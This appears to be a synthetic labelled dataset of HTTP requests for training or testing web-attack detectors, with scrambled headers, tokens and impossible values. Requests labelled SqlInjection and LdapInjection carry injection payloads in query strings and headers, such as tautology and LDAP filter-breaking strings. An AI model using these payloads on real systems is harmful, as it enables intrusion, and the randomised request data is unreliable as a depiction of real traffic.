GET /3tbunyglothspaAl/i6TIh54tPo5kf.TtD/odT/tPH@GLZ7/sqtDU0psbcVqJjj6ddQ/di0atVoujaroont/f3rnu.js?WbwhaAfw1suh=086286193&ds0iNnmg=nmqutiiteobvdao&wdgrl7rUr5ydtl=oin&nobtt3=eywdaroAnole&Vlink.40dA8S=985&tknlifrpsma=2t.lYHHb.HA9&taeEeup=804685892&uehtz=5&co3utHecl=%27&trfca0gimmasivn=231099&nHs2srti9etv=aoKg-ikA_O&conorio=00402&bqarce8Emsnot=noei%2Fe%2Fwh%2Fchild%3A%3Anode%28%29%5B++++position%28%29%3D049%5D+++++%7C++++5e4ehn%2Fo8eEa%2Fiduw%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D56%5D+++++or++%27jt%27++++%3D++%27&nT0yeht6eao3or=765520&rerEorheosf=37517538 HTTP/1.1
Host: www.wewor.it:80
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: compress;q=0.1, deflate
Accept-Language: eToW-yObwl;q=0.3, w2-nsaa4rs7;q=0.2, D4it-etrc4t, OUaw2gam-nf;q=0.4, l4tra-ns7knOny;q=0.5
Cache-Control: min-fresh=72799
Client-ip: 215.194.111.216
Cookie: 7cAcai4otqttnp9=3;l9edatAet=T(csn1l7;p7DX1UzQj_td=koaeabi3unauuimn
Cookie2: $Version="212"
Date: Sat, 29 Mar 08 02:10:44 UTC
ETag: W/"RJ4LQ1xuFMWfEwkbYGU4"
Expect: 100-continue
From: oayjh@w9ulna6.biz
If-Modified-Since: Mon, 15 May 06 01:24:20 CET
If-Unmodified-Since: Mon, 20 Jul 09 08:30:24 UTC
If-Match: "C4MbCYCfY54wx-My6eCe"
If-None-Match: "YVW6aYEA78kymeS"
If-Range: Sun, 13 Nov 05 20:50:30 UTC
Max-Forwards: 57
MIME-Version: 4.7
Pragma: clui2pz=7Ew
Proxy-Authorization: Basic ZmhkZTp0dWV1dA==
Authorization: 2ipAia yi2t1Oap=ceesw
Range: -21
Referer: http://www.omhm.de/ei2ohoY.swf
TE: trailers,trailers
Trailer: Referer
User-Agent: Sriel7e8ta (oSsm0amw; yjki0TkUf; tuqYt1x; xiM2.9)
UA-CPU: StrongARM
UA-Disp: 3801,296,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 7313x7197
Via: apk/8.9 21.12.95.71:4791, 6.1 www.lysfe.css
Transfer-Encoding: deflate
Upgrade: aau/4.8
Warning: 835 138.65.160.104 "Deeungnqc1e8n" 
X-Forwarded-For: 46.39.13.172
X-Serial-Number: 7433292
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49095
Start - Id: 35246
class: SqlInjection
GET /IMu@zPZtkQ2uLz@/NailTheuevaiatIsakmn/S.gb/SKP81mlocationj/e0oexdooeisddc/i6neabt/twAxQnEA9YOh/thnxhhtn1eseetnS0wct/dzRoQ7sKXe/ifuihlln/o2weScnS/%u8Nwinntw.jpg?vbscriptDWdropNYl.=OR++%27ore%27++LIKE++++%27Sim%25%27&OQ_-p0L=33 HTTP/1.1
Host: www.ubhiy9d9ri.ch
Connection: close
Accept: */*;q=0.1
Accept-Charset: *
Accept-Encoding: gzip, gzip;q=0.6, deflate, compress, gzip
Accept-Language: *;q=0.2
Cache-Control: skolrao=n
Client-ip: 150.203.233.233
Cookie: XSoMlEMNhc=69581;t2ernodltuout=hs;hsahinnrmpni=3660228295
Cookie2: $Version="9"
Date: Sun, 08 Mar 09 07:35:50 GMT
ETag: W/"jqRyTt_G6V.5opQIoq5"
Expect: 100-continue
From: yypu@9nadiOxX.st
If-Modified-Since: Wed, 28 Sep 05 15:25:05 UTC
If-Unmodified-Since: Wed, 23 Nov 05 10:52:52 GMT
If-Match: "o64x6zlvVa_jB03.F"
If-None-Match: "Sl6Hd0k_r0nWJP42AJV@"
If-Range: *
Max-Forwards: 1348
MIME-Version: 2.3
Pragma: no-cache
Proxy-Authorization: Digest qop=auth
Authorization: NTLM QTllc3RURWF0cm9zaWVlcmRyZXd1aWx0ZXJ0NEk2UTByaXhsSGFlZXJnZWlzb3Q=
Range: 686-87074
Referer: http://www.anpeppt.de/9tteT.jsp
TE: gzip;q=0.1,deflate;q=0.7,trailers
Trailer: Warning
User-Agent: Mozilla/8.3 (compatible; MSIE 6.9; Solaris; fveIOzc)
UA-CPU: 68000
UA-Disp: 1181,695,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 7374x0863
Via: HTTP/6.6 176.196.141.171, HTTP/3.7 153.192.207.115
Transfer-Encoding: yfqcxb; eikstlig=nie7
Upgrade: rtrrq0/4.2, nltst/2.4, Sic/2.9, oaewts/4.5
Warning: 389 www.eetaIMn.js "i6iB7Cled" "Wed, 06 Jan 10 21:20:43 GMT"
X-Forwarded-For: 242.188.252.188
X-Serial-Number: 99658845770
----: --------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 35246
Start - Id: 24040
class: Valid
GET /ro9/tfCRIfysCO/MxmloodstdinH/lFxa8Y/lrknh3ahllwxjamETx/2edsholdnoncnn/aWMob7B/n65yztOVVg@rcOx4FaIL/sB-6XdD-L81hVDo/rMOs.UOA0k@hUo.asp?san=ij&Et=ezkHazZC&e1wkmaoyehresed=e&SautoexecPKNNuprocessing-instruction32D=nhsnP%3Cl%3C8nneu&icysseieon=e&WrmZvid=lqP3nCzj&wie=dpn+e+wgeto%3F%3C%3E4tge&vk2hsnKWH0n=ifXVDoKamt&NcaEapdxhtbsn6r=ghcNest&zweenhribicF=7rbyqkersaieb0wLm&8scxli=007797926&pRmg7=obosdocumentgstzehneaiUgei&amng=b547u&tnnaetHiAeuem=0563 HTTP/1.1
Host: 245.77.207.187
Connection: close
Accept: */*
Accept-Charset: x-mac-korean, x-mac-chinesetrad, x-mac-turkish
Accept-Encoding: deflate;q=0.3, identity, identity;q=0.1, compress;q=0.0, gzip
Accept-Language: eR-u;q=0.7, nz0o5nzl-umrcNe
Cache-Control: min-fresh=870
Client-ip: 222.183.40.181
Cookie: mejwXpertGizya=Iea
Cookie2: $Version="03"
Date: Thu, 28 Jul 05 07:54:16 GMT
ETag: W/"20wIx6HmMcAyfM-Ple"
Expect: era0lhbh
From: ategn@e61x0hpQf.ch
If-Modified-Since: Mon, 04 Oct 04 10:36:55 UTC
If-Unmodified-Since: Thu, 16 Aug 07 23:37:25 CET
If-Match: "zvMcd2xC4hJzeiO"
If-None-Match: *
If-Range: "uzxGPqGG4cAUyddT"
Max-Forwards: 9686
MIME-Version: 5.8
Pragma: no-cache
Proxy-Authorization: 5pue neoh0ai=ade4maHi
Authorization: lnooe 7tatmoTa=ubrUp
Range: 3-,-932
Referer: http://mondvte.org/6es4Gn3t/euepe/9luHha/zngee.tiff
TE: trailers
Trailer: Date
User-Agent: Mozilla/8.4 (Windows; U; Win 9x 1.1; nt-Hm; rv:3.4.4) Gecko/09614559
UA-CPU: StrongARM
UA-Disp: 6759,036,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 314x0873
Via: 6.8 www.YYcn.htm:91, 8.4 187.255.4.65
Transfer-Encoding: gzip
Upgrade: cUYte/7.0, Lbem/8.5, drnfie/8.0, np54/2.3, taoeT/3.0
Warning: 652 250.250.27.45 "ucdaI7dsmtc" 
X-Forwarded-For: 240.187.200.43
X-Serial-Number: 81619019081
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24040
Start - Id: 37145
class: LdapInjection
GET /e7tpP/zth86pI1StwtIm/e.06fMSVwGhZ5K/ol1k/e6Ng/aOo/tTMpQpZ6O6wvkjjF66G.swf?QZpXsG4O=sKifR0jLMe&pe=n-AbjqB_7&ejriajfna=11&tdfauw=3GRvuRG&et5DerhieHRke=suan%29%28%26%28objectClass%3D+2r*%29&5i=eIAfUcvZ3y&et4ucxarceT=%5Ccrpt&1LKlpositioncw0gH=Uel%25rrIhdilogvar8n&openyqIU6Fzbody_I=2ZRnv1&hhRrnE5d=9473840268&kathye2gsu=00892274&ffnahe=qaapdoi&e54lp.dS=166139 HTTP/1.0
Host: www.uoasratu.st
Connection: nEewreI
Accept: */*;q=0.3
Accept-Charset: *;q=0.8
Accept-Encoding: *;q=0.9
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 186.207.13.158
Cookie: oieueAN5oaks=e&x;zawhGVyad=b460itmpo9ea;lnstnetkidzr=97244;lgOeetNidhei=ohdExaicen
Cookie2: $Version="395"
Date: Mon, 23 Nov 09 17:42:39 CET
ETag: W/"RxU5d45Z4IV2969"
Expect: 100-continue
From: tiriuma2@nheraeb.net
If-Modified-Since: Wed, 12 May 04 16:36:10 UTC
If-Unmodified-Since: Thu, 29 Apr 04 22:21:01 CET
If-Match: "1a6Mi1dl.UsE3pbzY"
If-None-Match: "VMMqCICmWsKijdE"
If-Range: Wed, 13 Jun 07 10:00:49 GMT
Max-Forwards: 848
MIME-Version: 8.7
Pragma: no-cache
Proxy-Authorization: NTLM SWhyYWEwZXJOR29UdG5pOGh3c3JhYWRyb2pvbkw1c2VycHU=
Authorization: Basic b2VxVWFqOm9hNnI=
Range: 88347-,9-
Referer: http://www.Ekeu3l.gov/lttrek5w/s5inE/dguf6/tealcofc.gif
TE: chunked,trailers,trailers
Trailer: Accept-Language
User-Agent: nCZ-CIQGWd http://www.t8eols.fr
UA-CPU: StrongARM
UA-Disp: 529,581,8
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 617x3755
Via: HTTP/6.1 www.ldat.gif, HTTP/3.5 www.am5thman.js, 7.2 202.201.165.2:325
Transfer-Encoding: gzip
Upgrade: 39se/0.8, sEeahl/6.8, 4chs1h/1.6, l5INot/1.9, a0kxka/1.4
Warning: 068 www.caus6t.html:451 "nAiwBaHg" 
X-Forwarded-For: 248.38.25.114
X-Serial-Number: 4738976742686812
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37145
Start - Id: 34719
class: Valid
PUT /slrLQUu_/ifMN7_r.1VaZd.tBRYl/enr8neisctneav/qzi/9yOwttEedlle0/1DX/t1czlf7sfkoz9hwedAt/ecRtaauTxW/6grBEiYUE0dpCDuhJ5ZV/pUQestk0bH/5S2gi1tnd/w4U_mCwvJ1SAE6uba.jpeg? HTTP/1.0
Content-Length: 234
Content-Language: a
Content-Encoding: deflate
Content-Location: http://fmrsmeA.st/anDud/jsgeeew.htm
Content-MD5: dnR2aGdBdGdhc3BzdGlrVQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 24 Aug 05 19:16:49 GMT
Last-Modified: Thu, 30 Dec 04 15:02:51 UTC
Host: www.Leeine.ch
Connection: keep-alive
Accept: video/*, video/quicktime;q=0.7, application/postscript;q=0.5
Accept-Charset: *
Accept-Encoding: 
Accept-Language: b-I2ag, rdaesth-hteeej, atSzid8-8aesosit;q=0.9, imf-j;q=0.2
Cache-Control: no-transform
Client-ip: 51.127.174.180
Cookie: 9e7elem64ix1r9t= 7ln zooejc;dd=rh=p[Qesrer;ut8ayHwnF7eor=e);osP=konquRz
Cookie2: $Version="53"
Date: Fri, 13 Nov 09 05:52:43 GMT
ETag: "ghddgygvcZw2JBfz"
Expect: ekhewk=nqemtdca
From: tta1oTo@Tdedrs.biz
If-Modified-Since: Mon, 05 Jan 09 19:38:12 UTC
If-Unmodified-Since: Wed, 31 Aug 05 16:02:46 GMT
If-Match: "fhvdlKDfX_QV0Pu"
If-None-Match: *
If-Range: Tue, 27 Jul 04 21:43:55 CET
Max-Forwards: 0
MIME-Version: 5.6
Pragma: no-cache
Proxy-Authorization: Basic bmlHR3BwOm9XbW1NZ28=
Authorization: y3qyv pomge=ncjela
Range: 27601-82680,576792-311040,-975285
Referer: http://7esWf.de/eeUdyri/H17rnl.html
TE: trailers,gzip
Trailer: If-Match
User-Agent: ldmaOr5soneing
UA-CPU: x86
UA-Disp: 550,4531,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 420x8395
Via: FTP/2.5 75.37.205.112:92836
Transfer-Encoding: gzip
Upgrade: btCas3/7.1
Warning: 270 www.akhXhs.js "ogdA" "Wed, 23 Dec 09 01:56:59 UTC"
X-Forwarded-For: 102.210.121.17
X-Serial-Number: 58172137914902284
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

lP=hlikekautoexecscript&bRosmmmtoeiamcn=~htta6'9tebgsoundno&auim3jeradetth5=rh3rtmdyatA~czeo&tthOeWturt=91040&a1ogosy=teA?e&bS8no9lshhU=2h&9toyeC=wst|6execopt&duco=7tbflza5cjtuliOtq&7lk=shutdownperl&rNoftdko8ii=b&zfonimns=du

End - Id: 34719
Start - Id: 2681
class: Valid
GET /ttasyiitLafe/unionbH98A@divLscriptIuexecs/fkn2ou/sdhwio/nLbRJ/mEqMMwWjKsslHxJq7./G6YcH9X90E4MWQ.php3?a7ueikaeacTkt=e&rnplrrAkaOX=00238&exH=an%2Ban+ovagfk%2Fr0&2aorint=378&ouEamdliso=966800&mrenw6ihoismir=+%3FoiTa%25r1eoh%25rRt%29 HTTP/1.1
Host: 251.132.140.33
Connection: close
Accept: application/*
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: ifudaah-iilon;q=0.8, nrEr6nd-feriq6P, x-wzPNhyad, reoAs-sinnnobe;q=0.0
Cache-Control: no-cache
Client-ip: 66.25.29.176
Cookie: ce6rhre7=?i Eoqoe>thsystemesnph-;oew=35527;podwa2or=f2ilr
Cookie2: $Version="21"
Date: Fri, 19 May 06 14:33:27 UTC
ETag: W/"YgfCl574zFZDDyBiItIN"
Expect: 100-continue
From: ovamHuqy@MlywzI.fr
If-Modified-Since: Fri, 11 Dec 09 11:41:25 GMT
If-Unmodified-Since: Fri, 06 Apr 07 10:03:26 GMT
If-Match: "k1GcTMDEHgwEo4Vbnr"
If-None-Match: "ZqWW5epxYowzyovxW@_"
If-Range: "_7_y0wXVMji@ESG"
Max-Forwards: 1
MIME-Version: 0.8
Pragma: eith='r'
Proxy-Authorization: Basic MUVsdDoxb3NlY29mZQ==
Authorization: Basic bnZydTpoemxl
Range: -23,-6679
Referer: http://wivsileo.de/cmsbfoe/hhqthht/3etsPa/tliiNe.htm
TE: trailers,deflate
Trailer: Accept-Encoding
User-Agent: aIjGnemjbz
UA-CPU: x86
UA-Disp: 6089,3163,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 486x934
Via: 6.2 www.secaE.jpeg:18
Transfer-Encoding: identity
Upgrade: azkuh/4.3, ztter/5.6, EyResi/1.5, vTvy/8.8
Warning: 749 www.okXda0.jpeg:63 "nQde" 
X-Forwarded-For: 94.59.133.217
X-Serial-Number: 8136074594585
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 2681
Start - Id: 37282
class: LdapInjection
PUT /u9/opaentsa.exe? HTTP/1.0
Content-Length: 92
Content-Language: oAgbT,lyr
Content-Encoding: gzip
Content-Location: /tconnttu/w8offgso.png
Content-MD5: ZU1PbmFjb3JzYXN0VGxhbg==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 20 Jul 04 16:06:40 GMT
Last-Modified: Sun, 01 Jul 07 22:21:54 CET
Host: www.tnMoiD.com:095
Connection: close
Accept: */*;q=0.7
Accept-Charset: windows-1251;q=0.1
Accept-Encoding: *;q=0.6
Accept-Language: ryoi)(    |   (ug0d=*)
Cache-Control: no-transform
Client-ip: 79.167.217.81
Cookie: sSginvar=8356;PizjL=mfbh80lt5rm&ym
Cookie2: $Version="4"
Date: Tue, 03 Mar 09 05:03:26 CET
ETag: "habrGbVuBjGHw0VnXPVY"
Expect: 100-continue
From: uAoeEcF@bauipcb2x.fr
If-Modified-Since: Fri, 22 Jun 07 04:39:29 UTC
If-Unmodified-Since: Wed, 19 Dec 07 16:44:27 CET
If-Match: "m-bNPi9tqD9qSf7vIg"
If-None-Match: "4jbDnZOHPA3X_Nem0"
If-Range: "FJhG62oiZNWFtJwvyH5"
Max-Forwards: 105
MIME-Version: 1.3
Pragma: no-cache
Proxy-Authorization: h0o5 os2gn=erur0
Authorization: ynena 0tnenx=aDeh
Referer: http://www.ltliso.gov/anTe/exfgie.rar
TE: trailers
Trailer: If-Range
User-Agent: aeh6pT4qfersIEohh
UA-Disp: 2933,1211,32
UA-OS: Win98
Via: 3.2 50.250.113.169, 3.0 10.74.206.105
Transfer-Encoding: gzip
Warning: 883 www.fRose.tiff "esne" "Sun, 08 Jun 08 18:40:43 UTC"
X-Forwarded-For: 62.116.110.58
X-Serial-Number: 62383698375
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

xEaabmsnt=tTJ1&04=bota6Sn&Hn6net=oostmaSrvaqz&iicvfe=ato>&scipi=237&7leeaorRioNwbr=tmpctto

End - Id: 37282
Start - Id: 3512
class: Valid
GET /riYM/a6shgt2sd/swkEBn7yNV8vc/a4UlC2J52iihKQNUJ/3z8YyrV15.aspx?remoptomlehra=ubh+&l4iehlaakJieaap=th%5DodC%3Fe3a1%25vep4baa&EOiaKxrt4oF=ye%3Fraorvbscript&mee=64&ohe=et3b2oo8GL&5fyi4e=780&gv2VJ9H=-etrghtallDmn8&ruantRt=zsevintcsnreplaceina%3B7pne&d7sosubEmnram=82 HTTP/1.1
Host: 244.8.247.7:49514
Connection: etcki9eQ
Accept: */*;q=0.1
Accept-Charset: *
Accept-Encoding: 
Accept-Language: n-ma, h-dq6pba;q=0.2
Cache-Control: no-transform
Client-ip: 61.50.151.28
Cookie: ajneanj=[etct;sogR1licsei=n81;xdeb=50371343;soGhnsaRlw=7;ue0=labXMR
Cookie2: $Version="02"
Date: Sun, 20 Apr 08 21:14:32 UTC
ETag: W/"Ydq2Pm754hX4E3m"
Expect: bnler4g=a9nou
From: 4qmTaq3m@xens.uk
If-Modified-Since: Mon, 19 Jan 09 11:27:32 UTC
If-Unmodified-Since: Sun, 15 Feb 04 01:11:05 GMT
If-Match: "GO8VNGPbP-CZdXAzBeMC"
If-None-Match: *
If-Range: Sat, 27 Sep 08 07:02:29 CET
Max-Forwards: 19
MIME-Version: 7.3
Pragma: no-cache
Proxy-Authorization: NTLM eXNhcGFJMmxyMGk3TnV2aWl1b3A3dGFndHZmYWllZGNpc25wb2w=
Authorization: Basic ZWhocjp0bElw
Range: -30400,-8
Referer: http://www.ruhy.it/zreT/tn8c9/aalueat/raitr/bael.rar
TE: trailers
Trailer: Connection
User-Agent: moA0f3soe/6.8
UA-CPU: StrongARM
UA-Disp: 845,505,32
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 3900x7810
Via: 1.1 www.Mfosrr.tiff, FTP/1.9 www.stargeri.png, 4.5 www.nont.shtml
Transfer-Encoding: identity
Upgrade: Eamtl/5.4, 3aie/0.8, hr5f/8.1, vea/3.5
Warning: 091 199.68.197.103 "tasntac2pontmt" "Sat, 20 Oct 07 17:48:51 GMT"
X-Forwarded-For: 36.213.69.49
X-Serial-Number: 8528165138107530
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 3512
Start - Id: 5023
class: Valid
PUT /casrondei/eSnrSc.cgi? HTTP/1.0
Content-Length: 57
Content-Language: ijaahah,cdl,handrth1
Content-Encoding: compress
Content-Location: http://etSd1.st/desh/srcNfro/yeefu/Enamo.mpeg
Content-MD5: cE5saXl0c2xhYTc5c3RydA==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 01 Jul 06 18:10:30 UTC
Last-Modified: Wed, 06 Feb 08 10:31:32 GMT
Host: www.H8aeidd8nf.ch:836
Connection: keep-alive
Accept: audio/basic;q=0.3
Accept-Charset: hz-gb-2312, windows-1253, windows-1254, x-mac-korean, ks_c_5601-1987;q=0.3
Accept-Encoding: 
Accept-Language: Uh-3xsgry, osd-st3;q=0.7
Cache-Control: min-fresh=96540
Client-ip: 162.231.248.117
Cookie: biebp=4HcvwWMZe
Cookie2: $Version="23"
Date: Wed, 25 Jul 07 19:28:01 GMT
ETag: "arxd.GetOL1VZFQ8"
Expect: rjidLy=lcseE5h
From: anypee@kdrqiteI.it
If-Modified-Since: Tue, 17 Jan 06 22:36:04 GMT
If-Unmodified-Since: Fri, 15 Jul 05 08:51:52 GMT
If-Match: "PDBxk8x-Q1fv_hqIiQc"
If-None-Match: *
If-Range: "44ZYO7NLLDypthJv0R@"
Max-Forwards: 92
MIME-Version: 2.1
Pragma: cYef='spewr'
Proxy-Authorization: Basic MmZuTnpyejplTWlTY2NzZQ==
Authorization: Digest realm
Range: -17,22294-37803,139-
Referer: http://www.retm.biz/mimsn5h/aabI6.js
TE: deflate
Trailer: Accept-Encoding
User-Agent: t7reEues3lthLa
UA-CPU: StrongARM
UA-Disp: 1514,212,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 8269x495
Via: 5.9 www.eoawin.css, HTTP/2.3 184.209.128.254, FTP/2.9 www.ig2Ppai.css
Transfer-Encoding: gzip
Upgrade: zcci/6.6, nahgit/2.1, zBd/1.0
Warning: 847 www.cs4tji.gif:1579 "ciCj6llogyAnxa" "Fri, 13 Oct 06 21:39:00 GMT"
X-Forwarded-For: 90.219.143.51
X-Serial-Number: 03530
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

EFLpwp-i2gk=aASRX_&aqei=653&aiM=dvWUbGo6w&itIti3=uhuritip

End - Id: 5023
Start - Id: 24354
class: Valid
GET /c77/wn/oiF01yH_eval/wp-.zK4rbodyHt_lh/5vsfAni/gBG-t24samv/i8c8OU/7aisnCr96Cocavttqh2.js?Oe=101&eeiel=280456&aaaohwtwlwcbu=239227104&pkjcz49av73S=tQJ&sti46e9caIup=ayOe&bqwhere.vlQ8cx3o=rAEGJ HTTP/1.1
Host: www.na2E.ch
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: no-cache
Client-ip: 114.108.65.238
Cookie: tz=81531;otNAtiIietnphps=724;Br3eetAcirtmr=8020346;aeo7mnhe=ne%omccdaeT5esa;Hgroup by0aHCzL=hgze6nevn;cenuD5fntuegq=Nustil7ad
Cookie2: $Version="7"
Date: Thu, 09 Sep 04 04:50:06 UTC
ETag: W/"iGg4GyFoonVM8sn"
Expect: dch6F
From: 5hRu@STpwssetis.be
If-Modified-Since: Wed, 22 Oct 08 06:20:52 UTC
If-Unmodified-Since: Tue, 21 Aug 07 14:53:49 CET
If-Match: "RuNHC@wzTGCZV_n88"
If-None-Match: *
If-Range: Sun, 28 Mar 10 20:11:59 UTC
Max-Forwards: 83
MIME-Version: 5.2
Pragma: RahasOc='puls7ih'
Proxy-Authorization: NTLM c29ib2V0ZXB6dGpzc2k2bm1vcnJoYWV0SXQwZ3RvczZ0bg==
Authorization: NTLM dU9yMWRmeDB3dGV0MHNSd2JsRGR0aTJodklvRWVubzduZw==
Range: -290,922508-,-602
Referer: /DllrdB/ncaH/Fzolm.jpg
TE: trailers
Trailer: User-Agent
User-Agent: jdqnTtgeei
UA-CPU: StrongARM
UA-Disp: 801,8735,8
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 352x5203
Via: HTTP/6.8 www.srrnEan.png, Igtda/2.3 117.136.56.119:8, FTP/9.0 www.eikh.htm
Transfer-Encoding: gzip
Upgrade: Hiu/7.2, tsosIp/1.1, 2cq/2.4, jea8Dd/0.5
Warning: 748 www.Nint.js:86733 "me6otyateqi77lTde" "Tue, 01 Mar 05 01:32:17 CET"
X-Forwarded-For: 73.2.112.190
X-Serial-Number: 6737813475044771
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24354
Start - Id: 31654
class: Valid
GET /jWIDkcninput6aC/eD-/ZPoGFscriptKRi/iohb/dUEV69kU2zzE_hnTmEG.shtml?e8gegwamn=2atR9t1eEt&nmb3reneeudBtoi=98253557&abu0dufmieuhuj=ue7reregt&ornen3E=7323376320&io559uceaif=Aa%3Aaroodduoci&cRiqpmcryo=sn9iherfTg1e&mD4sabd=mFaNjtFqI&Y1Hrcp=14&Ooo=tmpeg&_hQIS-VaP1=8065&ahseStt=7934728&oreiAeeaBpd=tqOk&sahsabreB=6295 HTTP/1.0
Host: www.rhitih.biz
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-cyrillic, iso-8859-2, x-mac-chinesesimp;q=0.3
Accept-Encoding: 
Accept-Language: Q-trh, neoest-ZsldzNus, rshee-andnfer;q=0.6
Cache-Control: max-age=467
Client-ip: 47.57.123.190
Cookie: g8ayNx=e;mw= it=ngnSci8eyty;6CPIKkU9=rnt;pvbi9pctep=r;sfngwsh=fe
Cookie2: $Version="354"
Date: Wed, 02 May 07 03:12:26 UTC
ETag: "u9R.S24VRKT4-Wy"
Expect: 100-continue
From: fCrLwe@tcabt.ch
If-Modified-Since: Wed, 29 Aug 07 24:35:24 UTC
If-Unmodified-Since: Thu, 21 May 09 02:00:10 UTC
If-Match: *
If-None-Match: "z11ivkLjgsBZQWBT"
If-Range: "T52Y-Zg7t6VUqGkFBjFJ"
Max-Forwards: 70
MIME-Version: 6.6
Pragma: F=tc
Proxy-Authorization: Digest cnonce="wn5we"
Authorization: Digest uri=/lehugf/tseaebnY/aarneko/Hvru9e/tnoLn5a.wmn
Range: 444-
Referer: /ontnat/ofsfeniL/xtserle.asp
TE: gzip,chunked,trailers
Trailer: Warning
User-Agent: Mozilla/8.0 (X11; U; Open BSD i586 1.0; er-kt; rv:9.0.7) Gecko/44856667
UA-CPU: 68000
UA-Disp: 0279,131,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 8191x528
Via: FTP/7.6 131.82.79.163, albrg/0.0 180.102.74.180
Transfer-Encoding: deflate
Upgrade: noyiNn/8.3, tMu5aT/7.1, acs/5.6
Warning: 847 245.165.104.253:38182 "wolt9DaseP" 
X-Forwarded-For: 13.228.134.190
X-Serial-Number: 049800080
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 31654
Start - Id: 13839
class: Valid
GET /ch/uiTtztdt6e2goartVOnw/nteFQDLwZOXGChrbHqU/dIbzR0Y/PIeSTED/naKa/eNBsQnQbkhp.TW/cjsbttt6r.js?pntShsNqcaer=o1acce+Teidio6%2Bivi&Uxterm243uBICbup=wbQ7iPm3Ws&47-ms=hPZxcK2HmP6&DtsbacoRatjji=96709892&m0srh=8taz&tshtobktoekSnTu=Ze%25nitmeo&Sdcgts0Sfcdsl=rel%7C&rnL2eatgs=4ae&bt=ysyssmhror++&rialhfesad=928154 HTTP/1.1
Host: www.tecelodwb.cz
Connection: close
Accept: application/zip;q=0.4, audio/x-wav;q=0.6
Accept-Charset: cp-950;q=0.3, euc-tw
Accept-Encoding: 
Accept-Language: hnepim-aoq, wfiz-qhazlo;q=0.2, img-eAau, e-scarht;q=0.5
Cache-Control: no-cache
Client-ip: 145.167.33.139
Cookie: esVAbhocje=5hg;hdilhaeEhThhnee=6;hA=ruRs;ZlEAx0r-Qoz_=4ywqcth
Cookie2: $Version="20"
Date: Tue, 13 Dec 05 17:17:00 UTC
ETag: "exJ04GpYog6.x7AEvVSu"
Expect: Sblat7=eync
From: 7iia@rhedat0s.it
If-Modified-Since: Thu, 06 Sep 07 13:44:47 CET
If-Unmodified-Since: Sat, 23 Jan 10 19:28:00 UTC
If-Match: *
If-None-Match: *
If-Range: Thu, 05 Feb 04 17:12:30 GMT
Max-Forwards: 5599
MIME-Version: 2.3
Pragma: tmT=umszodl
Proxy-Authorization: Basic bDBjbm50Om5BbW96dA==
Authorization: NTLM bmVjc29FYXkzaW5pOU5hZVlUd2VpZHhvYTNpYXJ0ZWllNWRUZTNuZQ==
Range: 691739-,100150-
Referer: /E4aH.gz
TE: deflate;q=0.3,chunked;q=0.5
Trailer: Authorization
User-Agent: onarD (nzTD@BV; vwgmEg7)
UA-CPU: MIPS
UA-Disp: 3251,0057,8
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 750x449
Via: 6.2 www.abjdri.png, HTTP/9.4 221.211.124.243
Transfer-Encoding: identity
Upgrade: eqp/4.6, eiffm/7.0
Warning: 272 www.ss2emoow.tiff "poeyaiei1gtltn" 
X-Forwarded-For: 166.8.232.165
X-Serial-Number: 2424153746137739
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 13839
Start - Id: 24364
class: Valid
GET /dTb96ej/u1ersov0dDmuTs.jpg?acqaeudn=123&hJ2=5639&OhThew=n4ii+ec+ioo%27j&zqeYjC3gIx=metErSc0nd&tbiawcaeh1=db+hE&@4fO=eNrh&V9e24=jes&9Wersseno0Tut0n=i%7Ce&eooSme49anHze=dtsat&jaodyuptginvnta=06711969&otettvtgeb=u3s HTTP/1.1
Host: www.OhnuEibn.com
Connection: close
Accept: */*
Accept-Charset: *;q=0.3
Accept-Encoding: identity, identity
Accept-Language: *;q=0.4
Cache-Control: no-transform
Client-ip: 5.120.157.173
Cookie: fo=72070;ynulyKHxQjt=copyd eseehi;dtAhfoetdI9ON=3802102
Cookie2: $Version="7"
Date: Fri, 06 Jul 07 17:09:39 GMT
ETag: W/"iGg4GyFoonVM8sn"
Expect: ei2n3oie=LItseeN
From: ed7mt@etomt2i3.gov
If-Modified-Since: Thu, 06 Apr 06 17:32:48 CET
If-Unmodified-Since: Mon, 02 Mar 09 03:19:29 UTC
If-Match: *
If-None-Match: "7QIVqZJSK5fPgYkMY"
If-Range: "6cmzok9EcMllWfHOmOkb"
Max-Forwards: 158
MIME-Version: 5.2
Pragma: no-cache
